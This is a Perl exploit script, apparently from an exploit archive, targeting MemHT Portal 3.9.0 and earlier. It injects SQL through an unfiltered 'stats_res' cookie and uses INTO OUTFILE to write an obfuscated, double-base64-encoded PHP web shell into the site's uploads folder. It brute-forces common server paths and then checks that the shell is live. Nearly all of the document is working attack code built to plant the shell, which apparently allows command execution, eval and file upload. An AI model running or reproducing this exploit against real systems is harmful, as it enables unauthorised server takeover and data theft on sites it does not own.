memht-shell.txt

`#!/usr/bin/perl  
#  
# MemHT Portal <= 3.9.0 Perl exploit  
#  
# discovered & written by Ams  
# ax330d [doggy] gmail [dot] com  
#  
# DESCRIPTION:  
# Script /inc/inc_statistics.php accepts unfiltered $_COOKIE's,  
# ($_COOKIE['stats_res']) which later goes to MySQL request. So we are able to make  
# sql injection.  
# This exploit tries to create shell in /uploads/media/defined.php.  
#  
# NEEDED:  
# magic_quotes_gpc = off  
# MySQL should be able to write to file  
# Know full server path to portal  
  
use strict;  
use warnings;  
use IO::Socket;  
  
print "  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
MemHT portal <= 3.9.0 Perl exploit  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
";  
  
@ARGV or &usage ;  
my $expl_url = shift;  
$expl_url =~ m#http://# or &usage;  
my $serv_path = shift || '-b';  
my $def_shell = '/uploads/media/defined.php';  
  
my $shell = '\%3C\%3Fphp\%20\%24s\%3D\%27YVhOelpYUW9KRjlRVDFOVVd5ZHdhSEJwYm1adkoxMHBQMlJwWlNod2FIQnBibVp2S0NrcE9q'  
.'QTdKR0ZzYkdZOUp6eGthWFlnWTJ4aGMzTTlJbUp2ZUNJK0p6c2thRDF2Y0dWdVpHbHlLQ2N1SnlrN2QyaHBiR1VvUmtGTVUwVWhQ'  
.'VDBvSkdZOWNtVmhaR1JwY2lna2FDa3BLWHNrWVd4c1ppNDlKR1l1Snp4aWNpOCtKenQ5Q2lSbGNqMGtabXc5SnljN0pITnRQU2M4'  
.'WkdsMklHTnNZWE56UFNKdVptOGlQa2x1Wm04NlczTmhabVZmYlc5a1pUMG5MbWx1YVY5blpYUW9KM05oWm1WZmJXOWtaU2NwTGlk'  
.'ZEptNWljM0E3VzJkc2IySmhiSE05Snk1cGJtbGZaMlYwS0NkeVpXZHBjM1JsY2w5bmJHOWlZV3h6SnlrdUoxMG1ibUp6Y0R0YmJX'  
.'Rm5hV05mY1hWdmRHVnpYMmR3WXowbkxtbHVhVjluWlhRb0oyMWhaMmxqWDNGMWIzUmxjMTluY0dNbktTNG5YU1p1WW5Od08xdGth'  
.'WE5oWW14bFpGOW1kVzVqZEdsdmJuTTlKeTVwYm1sZloyVjBLQ2RrYVhOaFlteGxaRjltZFc1amRHbHZibk1uS1M0blhTWnVZbk53'  
.'T3p4aWNpOCtXM0JvY0RvbkxuQm9jSFpsY25OcGIyNG9LUzRuWFNadVluTndPMXQxYzJWeU9pY3VaMlYwWDJOMWNuSmxiblJmZFhO'  
.'bGNpZ3BMaWRkSm01aWMzQTdQR0p5THo1YmRXNWhiV1U2Snk1d2FIQmZkVzVoYldVb0tTNG5YU1p1WW5Od096d3ZaR2wyUGp4aWNp'  
.'OCtKenNLYVdZb2FYTnpaWFFvSkY5UVQxTlVXeWR6WlhRblhTa3BlMmxtS0dselgzVndiRzloWkdWa1gyWnBiR1VvSkY5R1NVeEZV'  
.'MXNuWm1rblhWc25kRzF3WDI1aGJXVW5YU2twSUdsbUtDRnRiM1psWDNWd2JHOWhaR1ZrWDJacGJHVW9KRjlHU1V4RlUxc25abWtu'  
.'WFZzbmRHMXdYMjVoYldVblhTd2tYMFpKVEVWVFd5ZG1hU2RkV3lkdVlXMWxKMTBwS1NBa2MyMHVQU2M4YzNCaGJpQmpiR0Z6Y3ow'  
.'aVpYSnliM0lpUGtOdmRXeGtJRzV2ZENCdGIzWmxJSFZ3Ykc5aFpHVmtJR1pwYkdVaFBDOXpjR0Z1UGljN0NtbG1LQ0ZsYlhCMGVT'  
.'Z2tYMUJQVTFSYkoyVjJZV3duWFNrcGUyOWlYM04wWVhKMEtDazdaWFpoYkNna1gxQlBVMVJiSjJWMllXd25YU2s3SkhOdExqMXZZ'  
.'bDluWlhSZlkyeGxZVzRvS1R0OUlXVnRjSFI1S0NSZlVFOVRWRnNuWlhobFl5ZGRLVDhrYzIwdVBTYzhjSEpsUGljdVlDUmZVRTlU'  
.'VkZ0bGVHVmpYV0F1Snp3dmNISmxQaWM2TURzaFpXMXdkSGtvSkY5UVQxTlVXeWQyWmlkZEtUOGtabXc5YUdsbmFHeHBaMmgwWDJa'  
.'cGJHVW9KRjlRVDFOVVd5ZDJaaWRkS1Rvd08zMEtaV05vYnlBblBHaDBiV3crUEdobFlXUStQSFJwZEd4bFBpNHVMblJ0Y0NCemFH'  
.'VnNiQzR1TGp3dmRHbDBiR1UrUEcxbGRHRWdhSFIwY0MxbGNYVnBkajBpUTI5dWRHVnVkQzFVZVhCbElpQmpiMjUwWlc1MFBTSjBa'  
.'WGgwTDJoMGJXdzdJR05vWVhKelpYUTlkMmx1Wkc5M2N5MHhNalV4SWk4K0NqeHpkSGxzWlNCMGVYQmxQU0owWlhoMEwyTnpjeUkr'  
.'Q21KdlpIbDdabTl1ZEMxbVlXMXBiSGs2ZG1WeVpHRnVZU3hoY21saGJDeHpaWEpwWmp0aVlXTnJaM0p2ZFc1a0xXTnZiRzl5T2lN'  
.'ek16TTdZMjlzYjNJNkkyWTVaamxtT1R0bWIyNTBMWE5wZW1VNk1UQndlRHQ5Q2k1aWIzaDdjRzl6YVhScGIyNDZjbVZzWVhScGRt'  
.'VTdabXh2WVhRNmJHVm1kRHRpYjNKa1pYSTZNWEI0SUhOdmJHbGtJQ00yTmpZN1ltRmphMmR5YjNWdVpDMWpiMnh2Y2pvak16TXpP'  
.'MjFoY21kcGJqbzFPMjFoY21kcGJpMTBiM0E2TWpCd2VEdHdZV1JrYVc1bk9qRXdjSGc3ZDJsa2RHZzZZWFYwYnp0OUNpNXVabTk3'  
.'WW05eVpHVnlPakZ3ZUNCemIyeHBaQ0FqT1RrNU8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6WTJOanR3WVdSa2FXNW5PalZ3ZUR0'  
.'OUNpNW9hV1JsZTJOdmJHOXlPaU0wTkRRN2ZXbHVjSFYwZTJKaFkydG5jbTkxYm1RdFkyOXNiM0k2SXpZMk5qdGliM0prWlhJNk1Y'  
.'QjRJSE52Ykdsa0lDTTVPVGs3ZlhSaFlteGxlMlp2Ym5RdGMybDZaVG94TUhCNE8ySnZjbVJsY2kxamIyeHNZWEJ6WlRwamIyeHNZ'  
.'WEJ6WlR0OWFXNXdkWFI3YldGeVoybHVPakp3ZUR0OUNqd3ZjM1I1YkdVK1BDOW9aV0ZrUGp4aWIyUjVQaWN1SkdGc2JHWXVKend2'  
.'WkdsMlBpY3VKR1pzTGljOFpHbDJJR05zWVhOelBTSmliM2dpUGljdUpITnRMaWNLUEdadmNtMGdaVzVqZEhsd1pUMGliWFZzZEds'  
.'d1lYSjBMMlp2Y20wdFpHRjBZU0lnWVdOMGFXOXVQU0lpSUcxbGRHaHZaRDBpY0c5emRDSStDanh3UGp4cGJuQjFkQ0IwZVhCbFBT'  
.'SnpkV0p0YVhRaUlHNWhiV1U5SW5Cb2NHbHVabThpSUhaaGJIVmxQU0p3YUhCcGJtWnZJaTgrUEM5d1BqeDBZV0pzWlQ0S1BIUnlQ'  
.'angwWkQ1MWNHeHZZV1E2UEM5MFpENDhkR1ErUEdsdWNIVjBJSFI1Y0dVOUltWnBiR1VpSUc1aGJXVTlJbVpwSWk4K1BDOTBaRDQ4'  
.'TDNSeVBnbzhkSEkrUEhSa1BtTnRaRG84TDNSa1BqeDBaRDQ4YVc1d2RYUWdkSGx3WlQwaWRHVjRkQ0lnYm1GdFpUMGlaWGhsWXlJ'  
.'Z2RtRnNkV1U5SWlJdlBqd3ZkR1ErUEM5MGNqNEtQSFJ5UGp4MFpENWxkbUZzT2p3dmRHUStQSFJrUGp4cGJuQjFkQ0IwZVhCbFBT'  
.'SjBaWGgwSWlCdVlXMWxQU0psZG1Gc0lpQjJZV3gxWlQwaUlpOCtQQzkwWkQ0OEwzUnlQZ284ZEhJK1BIUmtQblpwWlhjZ1ptbHNa'  
.'VG84TDNSa1BqeDBaRDQ4YVc1d2RYUWdkSGx3WlQwaWRHVjRkQ0lnYm1GdFpUMGlkbVlpSUhaaGJIVmxQU0lpUGladVluTndPeTlw'  
.'Ym1OZlkyOXVabWxuTG5Cb2NDQS9JRHNwUEM5MFpENDhMM1J5UGp3dmRHRmliR1UrUEhBK0NqeHBibkIxZENCMGVYQmxQU0p6ZFdK'  
.'dGFYUWlJRzVoYldVOUluTmxkQ0lnZG1Gc2RXVTlJazlySWk4K1BDOXdQZ284TDJadmNtMCtQSE53WVc0Z1kyeGhjM005SW1ocFpH'  
.'VWlQbUo1SUVGdGN5QW9ZV3RoSUdGNE16TXdaQ2s4TDNOd1lXNCtQQzlrYVhZK1BDOWliMlI1UGp3dmFIUnRiRDRuT3c9PQ==\%27'  
.'\%3Beval\%28base64_decode\%28base64_decode\%28\%24s\%29\%29\%29\%3B';  
  
# You can add more :P  
my @paths = qw(  
/var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting /var/www/html /var/www/vhosts  
/home/www home/httpd/vhosts  
/usr/local/apache/htdocs  
/www/htdocs  
);  
  
if($serv_path ne '-b') {  
@paths = ($serv_path);  
}  
  
exploit($expl_url);  
  
sub exploit {  
  
# Defining vars.  
my $url = pop @_;  
  
print "\n\tExploiting $url\n";  
  
my($host, $path, $packet, $rcvd);  
$url =~ s#http://(.*?)(|/(.*?))\z#$host=$1 and ($path=$2)=~s/\/\z//#e;  
  
# Trying to get /cron.php to get server path  
$packet = "POST $path/cron.php HTTP/1.1\r\n";  
$packet .= "Host: $host\r\n";  
$packet .= "Connection: Close\r\n";  
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";  
$rcvd = send_pckt($host, $packet, 1);  
  
if( ! $rcvd) {  
print "\n\tUnable to connect to http://$host\n\n";  
exit;  
}  
if ($rcvd =~ /Undefined variable:/) {  
$rcvd =~ /f\s+in\s+(.*?)$path\/inc\/inc_readConfig/;  
@paths = ($1);  
print "\n\tFound path!\n";  
} else {  
print "\n\tStarting bruteforce...\n";  
}  
  
# Some bruteforce here if path is not defined  
foreach $serv_path (@paths) {  
  
print ("\n\tTesting $serv_path$path$def_shell ...\n");  
# Sending poisoned request  
$packet = "POST $path/index.php HTTP/1.1\r\n";  
$packet .= "Host: $host\r\n";  
$packet .= "Cookie: stats_res=1680x1050' UNION SELECT '$shell ' into outfile '$serv_path$path$def_shell'--\%20\r\n";  
$packet .= "Connection: Close\r\n";  
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";  
  
if( ! send_pckt($host, $packet)) {  
print "\n\tUnable to connect to http://$host\n\n";  
exit;  
}  
}  
  
# Checking for shell presence  
$packet = "POST $path$def_shell HTTP/1.1\r\n";  
$packet .= "Host: $host\r\n";  
$packet .= "Connection: Close\r\n";  
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";  
  
sleep(1);  
$rcvd = send_pckt($host, $packet, 1);  
if( ! $rcvd) {  
print "\n\tUnable to connect to http://$host\n\n";  
exit;  
}  
  
if ($rcvd =~ /tmp\s+shell/) {  
print "\n\tExploited!\n\n";  
} else {  
print "\n\tExploiting failed.\n\n";  
}  
  
}  
  
sub send_pckt() {  
  
my $dat = 1;  
my ($host, $packet, $ret) = @_;  
my $socket = IO::Socket::INET->new(  
Proto=>"tcp",  
PeerAddr=>$host,  
PeerPort=>"80"  
);  
if( ! $socket) {  
return 0;  
} else {  
  
print $socket $packet;  
if($ret) {  
my $rcv;  
while($rcv = <$socket>) {  
$dat .= $rcv;  
}  
}  
close $socket;  
return $dat;  
}  
}  
  
sub usage {  
print "\n\tUsage:\texpl.pl host [-b|full server path]  
  
(by default exlpoit checks /cron.php file errors to get real path,  
otherwise it will brute if failed, if used -b or none path is mentioned)  
  
Example:\t$0 http://localhost/ /var/www/htdocs  
$0 http://localhost/ -b  
$0 http://localhost/\n\n";  
exit;  
}  
  
  
`